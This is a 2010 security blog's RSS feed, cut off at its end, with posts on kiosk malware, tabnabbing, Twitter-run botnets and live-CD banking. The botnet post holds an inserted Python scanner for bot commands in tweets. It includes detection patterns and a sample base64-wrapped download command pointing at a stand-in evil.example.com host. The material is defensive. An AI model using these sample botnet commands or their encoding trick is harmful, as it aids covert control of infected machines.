<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>HackerCentric</title>
	<atom:link href="http://hackercentric.org/?feed=rss2" rel="self" type="application/rss+xml" />
	<link>http://hackercentric.org</link>
	<description></description>
	<lastBuildDate>Fri, 30 Jul 2010 01:14:15 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Kiosk Dangers</title>
		<link>http://hackercentric.org/?p=47</link>
		<comments>http://hackercentric.org/?p=47#comments</comments>
		<pubDate>Fri, 30 Jul 2010 01:14:15 +0000</pubDate>
		<dc:creator>dhughes</dc:creator>
				<category><![CDATA[Social Networking]]></category>
		<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[botnets]]></category>
		<category><![CDATA[malware]]></category>

		<guid isPermaLink="false">http://hackercentric.org/?p=47</guid>
		<description><![CDATA[I offer here some friendly  advice about public kiosk systems. Now, I define a kiosk system as any  system provided for public use. I realize that most of us, when we think  of kiosks think of those systems set up with a fixed interface to allow  us to find a store <a href='http://hackercentric.org/?p=47'>[...]</a>]]></description>
			<content:encoded><![CDATA[<p>I offer here some friendly advice about public kiosk systems. Now, I define a kiosk system as any system provided for public use. I realize that most of us, when we think of kiosks, think of those systems set up with a fixed interface to allow us to find a store in the mall, or check to see if a book at Barnes and Noble is in stock.</p>
<p>I&#8217;m being a bit more general when I talk about kiosk systems, however. I am speaking of systems provided for public use to allow people to check email, browse the web, or update their Facebook page. I am talking about systems found in libraries, hotel lobbies, and sometimes airport terminals. Sometimes you have to pay a fee to use them, but quite often they&#8217;re just sitting out there for anyone to use.</p>
<p>Seeing these systems I have to ask myself the following question: Who maintains them? Some are provided by a 3rd-party company as a service. Others are probably set up by roaming hotel or library personnel. Perhaps they get pre-configured at headquarters and sent out to all the &#8220;branches.&#8221; Regardless, as I see them sitting there all dusty and abused with coffee cup rings on the case, I have to wonder if these battered systems are ever again touched by the IT guys after their original setup. Oh sure, if a hard drive fails or coffee gets spilled into the keyboard someone will eventually come along and fix it. But these are not my concerns.</p>
<p>About three years ago I was waiting in a hotel lobby for my wife when I noticed one of these systems and, given my compulsive tendency to fiddle with things, I sat down at the keyboard and started looking around.   I noticed stuff almost immediately. Shortcuts to games&#8211;obviously not installed with the original software&#8211;filled the desktop. I checked the internet cache and was not terribly surprised. Porn and gaming sites were apparently often visited on this system.</p>
<p>The web browser seemed very slow to come up, and when it finally appeared on the screen I started seeing quite a number of pop-up ads. This system was riddled with adware and probably various kinds of malware as well. I looked on the tray for some indication of anti-virus software. An expired trial version of Norton or something similar had been installed, but never purchased.</p>
<p>However, the biggest surprise was still to come. A quick check of the Windows XP system settings revealed that the user account I was currently using, the same one dozens if not hundreds had used before me, had administrative rights on that system. This explained the seemingly endless list of software that others had freely installed. The system was a dangerous mess, and it seems to be the &#8220;norm&#8221; among those publicly available. These systems should ALWAYS be avoided. What follows are my reasons&#8230;</p>
<p>First of all, giving the average user administrative rights is like giving a kid a baseball bat to play with in a glass shop. I don&#8217;t say this to be insulting, I&#8217;m just stating a fact. Malware that runs under an account with write access to the system files, the registry and every other user&#8217;s profile can do irreparable damage to an operating system; run under a limited account, the same malware is confined to that one user&#8217;s files and settings. It&#8217;s common sense, but many who set up such systems are too lazy or apathetic to care. It&#8217;s much easier just to give everyone administrative rights so that nobody bothers you to install something or change a setting. Let them do it. It&#8217;s easier.</p>
<p>A few years ago I did IT administrative work for a securities trading company. I stood firm with regards to administrative rights.  Normal user accounts were not members of the local administrative group on systems. I never took the position, however, of withholding these rights as some sort of personal power trip, nor did I tell people I thought they&#8217;d break their systems. I was always quick to explain about malware and how I was trying to protect them. Heck, I even created secondary administrative accounts they could use if they needed it. I bent over backwards, but it was never  enough for some.</p>
<p>One lady was in constant gripe mode about not having administrative rights. I explained, and still she complained. One day, she brought her home system in and asked if I could have a look. It had gotten slow. I took it home that evening and spent an entire weekend removing dozens&#8230;no, hundreds of instances of malware. When I brought it back, I asked her &#8220;why did your home system have so much malware and your work system does not?&#8221; Her immediate answer was &#8220;Antivirus software is better on the work system&#8221; to which I replied &#8220;Nope.&#8221; I explained that her system was such a mess because she ran this system normally with administrative rights, giving malware much more to work with. She thanked me, gave me a case of Guinness for my work, and continued to complain, but perhaps a little less vehemently.</p>
<p>The point is that any system where users regularly do their day-to-day activities with administrative rights is on borrowed time. It&#8217;s like silly putty or that toy slime you sometimes buy (ok sometimes &#8220;I&#8221; buy). Once you drop it on the carpet you might as well toss it as you&#8217;ll never get out all the nasty bits  that it picks up. A kiosk system sitting in a lobby with administrative rights will pick up every bit of digital nastiness out there.</p>
<p>If I were evil, I believe I&#8217;d infect kiosk systems with keylogging software, collecting all the user names and passwords for every person logging in to PayPal, Facebook, or even their bank accounts. Such logins are ripe for the harvest on kiosk systems. Keyloggers come in two varieties. Software keyloggers are memory-resident programs that record every keystroke and transmit the log to a third party. Hardware keyloggers are small devices plugged in between the keyboard and the system. A hardware keylogger requires the bad guy to come back and retrieve the device later, but in return it is invisible to anything running on the host: no anti-virus scan or process list will show it, and only a physical look at the cable behind the machine will find it.</p>
<p>To further exacerbate the problem, often these kiosk systems are connected to the same network as everything else in the hotel. Imagine, if you will, a bit of nasty code running in memory on the kiosk system that scans the network looking for additional victims. A kiosk system could be a launching point for an attack on your laptop as you use the wireless network at the hotel, not to mention the hotel&#8217;s point of sale system and business related servers and databases. A clever virus could be written to constantly make reservations for all rooms, or cancel them. Of course, I&#8217;m just thinking out loud here. <img src='http://hackercentric.org/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<p>If you run a hotel or library and have such systems, here are a couple of excellent ideas. Hint: Read all three, but pay special attention to the first two. There&#8217;s a pop quiz at the end. <img src='http://hackercentric.org/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<p>1. Use a live CD, not a hard drive. Boot the system to an Ubuntu or Knoppix Live CD and let people browse all they want. At the end of the day, reboot the system. Whatever was downloaded or installed during the day lived only in RAM and is gone after the reboot, so every day starts from the same clean image. It&#8217;s a little slower to operate from a live CD to be sure, but worth it. Be clear about what a live CD does not protect: it says nothing about a hardware keylogger on the keyboard cable, and unless the BIOS is password-locked and set to boot only from the CD, anyone can boot the box from their own media instead.</p>
<p>2. Re-image the system daily. Create a basic system image and use this to restore the system every evening or when problems occur. This puts you back at square one every day. There really is no excuse for not at least doing this on kiosk systems. The process can even be automated to run at night with very little effort.</p>
<p>3. If for some incredible reason points 1 and 2 are not available to you (which, if you&#8217;re honest, they ARE) then make sure that you have decent anti-virus software, keep the systems patched, and, above all, do NOT give the default account administrative rights. I do not recommend this point, however. It requires some ongoing &#8220;maintenance.&#8221; You may start off with good intentions, but eventually the cares and woes of your other responsibilities will distract you and before you know it the patches and virus signatures are out of date. Then there&#8217;s that time you make an &#8220;exception&#8221; and give someone admin rights for some strange reason and then forget to revoke them. Necessity may be the mother of invention, but laziness can be its favorite uncle. Make your life easier and do the smart thing: Use a Live CD or re-image the systems regularly.</p>
<p>There are other options as well. Thin clients (Citrix, for example) move the operating system off the machine in front of the user and onto a remote server, so nothing the user does touches a local disk. However, such solutions are usually costly and not within the budget of most.</p>
<p>So what if you&#8217;re a hotel customer or you want to use that library system? Don&#8217;t do it unless you know they are following one of my first two points above. But also don&#8217;t  be afraid to bring along your own live CD and ask if you can use it. You may get strange looks or be viewed suspiciously. This is a good opportunity to introduce that library IT guy to the wonders of a clean, bootable, non-persistent environment.</p>
<p>If you &#8220;have&#8221; to use a kiosk without proper protection (and you never have to) then use common sense. Don&#8217;t visit sites to which you log in. If you happen to visit any such site, even on a safe system, make certain you log out completely. My wife&#8217;s family visited once and one of her relatives often used her computer for his facebook updates. Almost every time my wife sat down she found herself logged into his facebook account. (I had some really good ideas but she wouldn&#8217;t let me do anything.:-) )  Imagine a stranger sitting down at that kiosk system in the hotel finding himself logged into your online bank account or email.</p>
<p>Finally, I just want to say that Kiosk systems &#8220;can&#8221; be safe if those in charge follow best practice, but they should never be completely trusted. Besides, you&#8217;re on vacation. Give Facebook a rest and go to the beach. <img src='http://hackercentric.org/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<p>Quiz: Which of the following is the least desirable option for keeping public systems &#8220;clean&#8221; in a hotel or library?</p>
<p>A) Use a live CD</p>
<p>B) Use a hard drive-based OS, but keep patches and anti-virus up to date.</p>
<p>C) Use a hard-drive based OS, but re-image or clone it daily.</p>
<p>The correct answer is B. <img src='http://hackercentric.org/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<p>David H.</p>
]]></content:encoded>
			<wfw:commentRss>http://hackercentric.org/?feed=rss2&amp;p=47</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Symbiosis in Malware</title>
		<link>http://hackercentric.org/?p=39</link>
		<comments>http://hackercentric.org/?p=39#comments</comments>
		<pubDate>Tue, 15 Jun 2010 16:33:22 +0000</pubDate>
		<dc:creator>dhughes</dc:creator>
				<category><![CDATA[Application Security]]></category>
		<category><![CDATA[botnets]]></category>
		<category><![CDATA[malware]]></category>

		<guid isPermaLink="false">http://hackercentric.org/?p=39</guid>
		<description><![CDATA[Symbiosis is a term commonly used to describe the relationship between two unlike organisms who interact in such a way as to provide benefits to one or both organisms, but usually not at the cost of the survival of one, as in contrast to a predatory or competitive relationship. Symbiosis usually falls into one of <a href='http://hackercentric.org/?p=39'>[...]</a>]]></description>
			<content:encoded><![CDATA[<p>Symbiosis is a term commonly used to describe the relationship between two unlike organisms that interact in such a way as to provide benefits to one or both, but usually not at the cost of the survival of either, in contrast to a predatory or competitive relationship. Symbiosis usually falls into one of three categories: parasitism, commensalism, and mutualism. Let&#8217;s define these terms first in relation to natural science.</p>
<p>1. <strong>Parasitism</strong> &#8211; A symbiotic relationship where one organism benefits and the other is harmed. This well-known type of relationship is exhibited in the way a tapeworm feeds off nutrients in the digestive tract or the way a mosquito feeds on the blood of the victim organism. Some parasitic relationships can be deadly and others more benign. But even if only in a small way, one organism is adversely affected.</p>
<p>2. <strong>Commensalism</strong> &#8211; A symbiotic relationship where one organism benefits and the other is neither significantly harmed nor helped. A spider building a web on a plant is a good example. Some animals rely for their dwellings on the abandoned dens of others. Egrets are often seen walking around herds of cattle, eating insects stirred up by the activity.</p>
<p>3. <strong>Mutualism</strong> &#8211; This is perhaps the most interesting form of symbiosis. In this relationship, both organisms benefit from each other. Certain birds eat parasitic insects from the ears and mouths of larger animals. The clownfish and the anemone protect one another. Many examples could be given for this kind of symbiosis.</p>
<p>Now that we&#8217;ve defined our terms, we can see how this applies to malware.</p>
<p>There has always been a symbiotic relationship between malware and the system it infects. Historically, the symbiosis has taken a parasitic form. A computer is infected by a virus, and the results have been corrupted or destroyed files, pop-ups, or a system which no longer even boots. The authors of such malware were motivated by notoriety. Having their customized &#8220;you&#8217;ve been pwned!&#8221; graphic appear on the screens of millions of now incapacitated systems was their lofty goal.</p>
<p>The malware trend has shifted toward a more commensalistic symbiosis as the motivations behind its creation have shifted. Malware is now written more for financial gain than for notoriety and infamy. The contrast is stark. Attackers want to do nothing that would draw attention to their presence in your system. They would rather you carry on as usual while they use your bandwidth and processor power for their purposes. Doing harm or displaying banners is completely out of the question and counter-productive for their purposes.</p>
<p>This relationship has no benefit for the victim. On the contrary, the victim&#8217;s resources are being used by the attacker. In this respect, malware fails to rise completely above the level of parasite. But for the average user, the liberties taken by the malware largely go unnoticed. It is usually not the end user who notices the malware but the network administrator who notices the strange amount of traffic traversing his perimeter. The user is adversely affected, but only slightly, and the less the attacker affects your system and draws attention to his presence, the better. The attacker strives for a purely commensalistic symbiosis.</p>
<p>This brings up mutualism. Does Malware ever appear in this kind of symbiosis? To my knowledge, it does not. However, imagine, if you will, an end user carelessly clicking a link and being presented the following message:</p>
<p>&#8220;The software you are about to install will increase your system performance by at least 20 percent and protect you from many forms of malware.&#8221;</p>
<p>We see something similar to this with the fake anti-malware websites. The victim is presented with progress bars and drive letters to make him think the software is cleaning malware, when in fact it is installing very bad stuff. But this is not mutualism, in which both organisms truly benefit.</p>
<p>What if, however, the malware actually DID increase system performance? What if it did protect the system from other malware?</p>
<p>The real question is, if malware were installed on a system where it did add that system to a botnet and use resources, but it actually boosted performance or provided some other benefits to that user, would that user care?</p>
<p>In future, I will post more about this and the specific application for various kinds of malware.</p>
<p>David H.</p>
]]></content:encoded>
			<wfw:commentRss>http://hackercentric.org/?feed=rss2&amp;p=39</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Tabnabbing &#8211; A New Phishing Tactic</title>
		<link>http://hackercentric.org/?p=37</link>
		<comments>http://hackercentric.org/?p=37#comments</comments>
		<pubDate>Tue, 25 May 2010 13:17:42 +0000</pubDate>
		<dc:creator>dhughes</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://hackercentric.org/?p=37</guid>
		<description><![CDATA[Aza Raskin reports on a new JavaScript trick in the phishing scammer&#8217;s arsenal that allows a phishing site opened in a tab in your web browser to change its content after that tab loses focus. A user opens the site in a tab, leaves it, and after a few seconds, it looks just <a href='http://hackercentric.org/?p=37'>[...]</a>]]></description>
			<content:encoded><![CDATA[<p>Aza Raskin <a href="http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/">reports</a> on a new JavaScript trick in the phishing scammer&#8217;s arsenal that allows a phishing site opened in a tab in your web browser to change its content after that tab loses focus. The page&#8217;s script notices that the user has switched away, waits a while, and then rewrites its own title, favicon and body so that the tab looks just like a Gmail page that needs logging into again. A user opens the site in a tab, leaves it, comes back to a row of tabs, and signs in to the impostor. This attack could be combined with other types of attacks designed to detect browser history, so that the site that appears is one the end user actually uses.</p>
<p>Using the <a href="https://addons.mozilla.org/en-US/firefox/addon/722/">NoScript plugin</a> in Firefox is probably one of the best ways to avoid this trap, since the swap cannot happen without script, though I&#8217;m still trying to decide whether this provides some true, additional danger or is simply an interesting novelty. The one thing the page cannot change is the URL in the address bar, so the habit of checking it before typing a password still works. Regardless, it does take advantage of our tendency to have so many things open in our browser at one time that it would be easy to think that we actually DID open that Gmail page and simply forgot about it. I have seen end users with up to 30-40 tabs open at the same time.</p>
<p>I&#8217;ll probably be saying more about this as I have a look at the Javascript source that Raskin provides on his site.</p>
<p>David H.</p>
]]></content:encoded>
			<wfw:commentRss>http://hackercentric.org/?feed=rss2&amp;p=37</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Botnet Control- From IRC to Twitter</title>
		<link>http://hackercentric.org/?p=31</link>
		<comments>http://hackercentric.org/?p=31#comments</comments>
		<pubDate>Thu, 13 May 2010 20:13:40 +0000</pubDate>
		<dc:creator>dhughes</dc:creator>
				<category><![CDATA[Application Security]]></category>
		<category><![CDATA[Social Networking]]></category>
		<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[botnets]]></category>

		<guid isPermaLink="false">http://hackercentric.org/?p=31</guid>
		<description><![CDATA[Botnets have historically been controlled via IRC. A bot-herder would run specially designed scripts in IRC channels from which the infected systems could retrieve commands. IRC served as a platform for control.
Over the last couple of years Twitter has also become such a platform because of its wide accessibility. Accounts on Twitter can easily <a href='http://hackercentric.org/?p=31'>[...]</a>]]></description>
			<content:encoded><![CDATA[<p>Botnets have historically been controlled via IRC. A bot-herder would run specially designed scripts in IRC channels from which the infected systems could retrieve commands. IRC served as a platform for control.</p>
<p>Over the last couple of years Twitter has also become such a platform because of its wide accessibility. Accounts on Twitter can easily be set up anonymously. Using a Twitter client, an attacker may now control botnet systems from a smartphone. While he&#8217;s standing in the frozen food section of his local grocery store, he&#8217;s launching a DDoS attack against a network. The appeal of this is certainly understood.</p>
<p>A new tool called <a href="http://sunbeltblog.blogspot.com/2010/05/diy-twitter-botnet-creator.html">TwitterNET Builder</a> has recently made the news as it provides script kiddies an easy way to achieve Botnet control using Twitter. The software creates an executable used to infect the target systems, causing them to watch for specific commands in specific Twitter accounts.</p>
<p>Twitter&#8217;s response has been swift. It seems that accounts where these commands are showing up are, understandably, being suspended. The same thing happened back in the IRC days when accounts were found to be automatically posting such things in chat channels. Attackers at this point would need to find a way to encode these commands so as to fly under the radar of Twitter&#8217;s administrators. TwitterNET Builder seems to ship a fixed list of commands, which could be easily detected by keyword. The ability to customize the commands to use more common keywords, or even to encode the command text, would provide more cover for the attacker.</p>
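<p>What a command watch looks like when it also anticipates the encoding trick, as an added example that is neither TwitterNET Builder&#8217;s code nor Twitter&#8217;s own filtering: the scanner walks a feed of (account, text) pairs, parses a small dot-prefixed command grammar, and additionally tries the base64 decoding of any token that looks like base64, the cheapest way to wrap a command so that a keyword filter misses it. The command names, account names and sample tweets are constructed for illustration; the real kit&#8217;s command list is not reproduced here.</p>

```python
"""Spot bot-herder commands in a stream of tweets, plain or base64-wrapped.

Added example, not code from the HackerCentric post or from TwitterNET
Builder.  The command grammar, account names and sample tweets are
constructed for illustration.
"""
import base64
import binascii
import re

# Hypothetical dot-prefixed command grammar: name -> minimum argument count.
COMMANDS = {
    "DDOS": 2,        # .DDOS <host> <port>
    "DOWNLOAD": 1,    # .DOWNLOAD <url>   fetch and run a payload
    "VISIT": 1,       # .VISIT <url>      open a page (click fraud)
    "STOP": 0,        # .STOP             halt the current task
    "REMOVEALL": 0,   # .REMOVEALL        uninstall the bot
}

# A dot immediately followed by an upper-case word, preceded by whitespace or
# the start of the text, then any run of whitespace-separated arguments.
CMD_RE = re.compile(r"(?<!\S)\.([A-Z]+)((?:[ \t]+\S+)*)")
# Tokens that could be base64: alphabet chars only, at least 8, up to two '='.
B64_RE = re.compile(r"[A-Za-z0-9+/]{8,}={0,2}")


def parse_command(text):
    """Return (name, args) for the first well-formed command in text, else None."""
    for m in CMD_RE.finditer(text):
        name, args = m.group(1), m.group(2).split()
        if name in COMMANDS and len(args) >= COMMANDS[name]:
            return name, args
    return None


def decode_candidates(text):
    """Yield the text itself, then the base64 decoding of every token that
    looks like base64 and decodes to printable ASCII."""
    yield text
    for tok in text.split():
        if len(tok) % 4 != 0 or not B64_RE.fullmatch(tok):
            continue
        try:
            decoded = base64.b64decode(tok, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if decoded.isprintable():
            yield decoded


def scan_feed(tweets):
    """tweets: iterable of (account, text).  Returns a list of
    (account, text, command, args) for every tweet carrying a command."""
    hits = []
    for account, text in tweets:
        for candidate in decode_candidates(text):
            parsed = parse_command(candidate)
            if parsed is not None:
                hits.append((account, text, parsed[0], parsed[1]))
                break
    return hits


# Constructed sample feed.  The third tweet carries a DOWNLOAD command, but
# base64-wrapped so that a filter on the command keywords never sees it.
ENCODED_CMD = base64.b64encode(b".DOWNLOAD http://evil.example.com/update.exe").decode()
SAMPLE_FEED = [
    ("weather_orlando", "Sunny today, high of 91. Stay hydrated."),
    ("herder_account", ".DDOS victim.example.net 80"),
    ("herder_account", ENCODED_CMD),
    ("some_student", "Finally done with my .NET homework"),
    ("herder_account", ".DDOS"),          # malformed: too few arguments
]

if __name__ == "__main__":
    for account, text, cmd, args in scan_feed(SAMPLE_FEED):
        print(f"{account}: {cmd} {' '.join(args)}    <- {text[:40]}")
```

<p>The base64 tweet contains none of the command keywords, which is exactly why a filter on the builder&#8217;s fixed list misses it; decoding suspicious tokens before matching closes that particular gap. The attacker&#8217;s next move (a private substitution table, a keyed cipher) is what turns this into an arms race, which is the argument for blocking the channel rather than just filtering it.</p>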
<p>Social Networking has always provided a stealthy platform from which attackers may control their victims. I wonder if, somewhere out there, someone&#8217;s writing &#8220;FacebookNET Builder.&#8221; Maybe it&#8217;s already being used. Setting up accounts on Facebook is a process that is a bit more involved than Twitter, so that might be an impediment for an attacker.</p>
<p>The best solution from the standpoint of a network administrator who desires to protect his people from these attacks would be to block Twitter and other social networking sites altogether. IRC is already blocked at most corporate perimeters for this very reason, and blocking Twitter would likewise remove the ability of an infected system to receive instructions from its botnet master. The blocked requests are worth logging, too: a machine that keeps polling the same Twitter account every few minutes after the block is in place is telling you it is infected.</p>
<p>The scenarios for doing evil are many, and becoming more numerous as more platforms for social networking are unveiled. Today it&#8217;s Facebook and Twitter. Tomorrow &#8211;who knows?  The question is, as these new social networking platforms are being created, are their creators thinking about how their applications could be used for evil? Probably not. But it&#8217;s such a nice thought. <img src='http://hackercentric.org/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<p>David H.</p>
]]></content:encoded>
			<wfw:commentRss>http://hackercentric.org/?feed=rss2&amp;p=31</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Jon Stewart Slams Apple</title>
		<link>http://hackercentric.org/?p=27</link>
		<comments>http://hackercentric.org/?p=27#comments</comments>
		<pubDate>Thu, 29 Apr 2010 12:43:40 +0000</pubDate>
		<dc:creator>dhughes</dc:creator>
				<category><![CDATA[Humor]]></category>
		<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://hackercentric.org/?p=27</guid>
		<description><![CDATA[I do not believe I have laughed this hard in a very long time. Enjoy!
http://tv.gawker.com/5526868/jon-stewart-slams-apple-over-its-handling-of-gizmodo-case
In other Apple news, Jobs explains why Flash is not supported on the iPhone, iPad and iPod touch. They will support HTML 5 instead, but his reasoning is interesting:
Jobs begins by questioning the closed nature of the product, noting that &#8220;Adobe’s Flash products <a href='http://hackercentric.org/?p=27'>[...]</a>]]></description>
			<content:encoded><![CDATA[<p>I do not believe I have laughed this hard in a very long time. Enjoy!</p>
<p><a href="http://tv.gawker.com/5526868/jon-stewart-slams-apple-over-its-handling-of-gizmodo-case" target="_blank">http://tv.gawker.com/5526868/jon-stewart-slams-apple-over-its-handling-of-gizmodo-case</a></p>
<p>In other Apple news, <a href="http://www.foxnews.com/scitech/2010/04/29/flash-iphone-apples-steve-jobs-finally-explains/">Jobs explains</a> why Flash is not supported on the iPhone, iPad and iPod touch. They will support HTML 5 instead, but his reasoning is interesting:</p>
<blockquote><p>Jobs begins by questioning the closed nature of the product, noting that &#8220;<a href="http://www.adobe.com/products/flash/" target="_blank"><strong>Adobe’s Flash products</strong></a> are 100% proprietary. They are only available from Adobe, and Adobe has sole authority as to their future enhancement, pricing, etc.&#8221; Closed products stifle innovation, Jobs argues.</p></blockquote>
<p>Uh&#8230;and Apple products are somehow more&#8230;open&#8230;than Adobe&#8217;s?  Unbelievable.</p>
]]></content:encoded>
			<wfw:commentRss>http://hackercentric.org/?feed=rss2&amp;p=27</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Google Collects WiFi Information</title>
		<link>http://hackercentric.org/?p=25</link>
		<comments>http://hackercentric.org/?p=25#comments</comments>
		<pubDate>Mon, 26 Apr 2010 22:52:24 +0000</pubDate>
		<dc:creator>dhughes</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://hackercentric.org/?p=25</guid>
		<description><![CDATA[According to this article, Google has announced that, as part of its Street View service, along with photographs of streets and such, it is going to collect Wi-Fi SSIDs and MAC addresses as well, meaning that Google is now in the business of wardriving. This is starting in Germany, but it will assuredly <a href='http://hackercentric.org/?p=25'>[...]</a>]]></description>
			<content:encoded><![CDATA[<p>According to <a href="http://www.theregister.co.uk/2010/04/22/google_streetview_logs_wlans/" target="_blank">this article</a>, Google has announced that, as part of its Street View service, along with photographs of streets and such, it is going to collect Wi-Fi SSIDs and MAC addresses as well, meaning that Google is now in the business of wardriving. This is starting in Germany, but it will assuredly happen in the United States as well. This in and of itself is not terribly troubling. I&#8217;m not certain how useful such information is really going to be. As I wardrive, I notice networks named after businesses and people, but quite often they are left at the default &#8220;Linksys&#8221; or &#8220;Netgear&#8221; names. SSIDs can be changed, and so can MAC addresses.</p>
<p>What should be alarming to all is that this is just another step in Google&#8217;s agenda to know everything it can about you. <a href="http://www.youtube.com/watch?v=A6e7wfDHzew" target="_blank">Google has made no secret of the company&#8217;s lack of respect for privacy</a>, taking the &#8220;if there&#8217;s something you don&#8217;t want anyone to know about maybe you shouldn&#8217;t be doing it&#8221; position. It&#8217;s an old argument used to further erode our rights. People who want privacy obviously have something to hide.</p>
<p>What I propose is this. Everyone who reads this who owns a wireless router, change your SSID to &#8220;GoogleStinks&#8221;  or &#8220;GooglehatesPrivacy&#8221;.  Obviously, my readership will need to expand beyond 2 people for this to make a difference. <img src='http://hackercentric.org/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<p>David H.</p>
]]></content:encoded>
			<wfw:commentRss>http://hackercentric.org/?feed=rss2&amp;p=25</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Ubuntu Live CDs&#8211;Sanitized for Your Protection</title>
		<link>http://hackercentric.org/?p=20</link>
		<comments>http://hackercentric.org/?p=20#comments</comments>
		<pubDate>Mon, 19 Apr 2010 01:57:20 +0000</pubDate>
		<dc:creator>dhughes</dc:creator>
				<category><![CDATA[Security Tools]]></category>
		<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://hackercentric.org/?p=20</guid>
		<description><![CDATA[This article caught my eye this morning. The CIO of CNL Bank in Orlando is considering sending its customers Ubuntu Live CDs customized to autoload the web browser defaulting to the banking website. This places the customer in a sanitized operating system isolated from the customer&#8217;s home operating system. The reason for this is obvious&#8211;to <a href='http://hackercentric.org/?p=20'>[...]</a>]]></description>
			<content:encoded><![CDATA[<p>This <a href="http://blogs.computerworld.com/15815/can_ubuntu_save_online_banking">article </a>caught my eye this morning. The CIO of CNL Bank in Oriando is considering sending its customers Ubuntu Live CDs customized to autoload the web browser defaulting to the banking website. This places the customer in a sanitized operating system isolated from the customer&#8217;s home operating system. The reason for this is obvious&#8211;to mitigate against the effects of malware infections on the customer&#8217;s system while the user performs online banking transactions. Malware, depending on how it was designed, can often steal authentication information from banking customers as they log in. Software keyloggers as well can steal all the keystrokes and transmit them to the attacker, giving him access to all sorts of data.</p>
<p>This is a very good idea. The Live CD would not be persistent, meaning that whatever bad things are in memory would be no longer there when the system was rebooted. The user would always be greeted by the same safe, clean environment.</p>
<p>Making this a requirement of customers is also not a bad idea.  The session to the bank could somehow be keyed to the Live CD, making any other connection impossible. It is really more about protecting the bank than the consumer. Perhaps the FDIC could lower premiums for banks who inforce such policies and controls? &lt;shrug&gt;.</p>
<p>However, we must not fall into what I call the SSL trap. Some companies who started doing business transactions online have had a bad habit the past of telling their customers that because their site uses SSL, it&#8217;s perfectly safe from intruders. Many such companies have found out the hard way that SSL does nothing to mitigate against XSS, SQL Injection and the like.  Hopefully, banks will not think of this kind of sandboxing as a bullet proof vest either. While Malware may be virtually eliminated, other man-in-the-middle attacks still pose a threat. And let us not forget about hardware keyloggers.</p>
<p>I say that malware may be &#8220;virtually&#8221; eliminated. A system booted from a live CD may be isolated from the user&#8217;s hard drive and any malware that infects it, but it is not invincible against memory-resident baddies that infect the system while the user has it up and running. I wouldn&#8217;t be surprised if malware creators shifted their attention to Ubuntu should the live CD become a popular way to do banking. I&#8217;m also thinking about how simple it would be to create a trojan version of the LiveCD with a counterfeit label. Hey, I&#8217;m a paranoid weirdo geek. I can&#8217;t help but think of such things. <img src='http://hackercentric.org/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<p>The inconvenience exists, of course, with having to reboot your system every time you want to do online banking transactions. One alternative to rebooting, however, is that the user could also install Virtualbox and run the live CD in a virtual machine. As with security controls and policies, we are always slowed down a bit. Security is no friend to efficiency. It is the price we pay.</p>
<p>Nonetheless, my hat&#8217;s off to the geeks working at banks who come up with these simple, elegant solutions for end-user security.<br />
DH</p>
]]></content:encoded>
			<wfw:commentRss>http://hackercentric.org/?feed=rss2&amp;p=20</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Humor Injection</title>
		<link>http://hackercentric.org/?p=18</link>
		<comments>http://hackercentric.org/?p=18#comments</comments>
		<pubDate>Mon, 19 Apr 2010 01:56:26 +0000</pubDate>
		<dc:creator>dhughes</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://hackercentric.org/?p=18</guid>
		<description><![CDATA[
I&#8217;d almost forgotten about this XKCD strip until I stumbled upon it again yesterday.

]]></description>
			<content:encoded><![CDATA[
<p>I&#8217;d almost forgotten about this XKCD strip until I stumbled upon it again yesterday.</p>
<p><span><span><img src="http://imgs.xkcd.com/comics/exploits_of_a_mom.png?__SQUARESPACE_CACHEVERSION=1267188050905" alt="" /></span></span></p>
]]></content:encoded>
			<wfw:commentRss>http://hackercentric.org/?feed=rss2&amp;p=18</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>OWASP WTE Live CD Review</title>
		<link>http://hackercentric.org/?p=17</link>
		<comments>http://hackercentric.org/?p=17#comments</comments>
		<pubDate>Mon, 19 Apr 2010 01:49:21 +0000</pubDate>
		<dc:creator>dhughes</dc:creator>
				<category><![CDATA[Reviews]]></category>
		<category><![CDATA[Web Application Security]]></category>

		<guid isPermaLink="false">http://hackercentric.org/?p=17</guid>
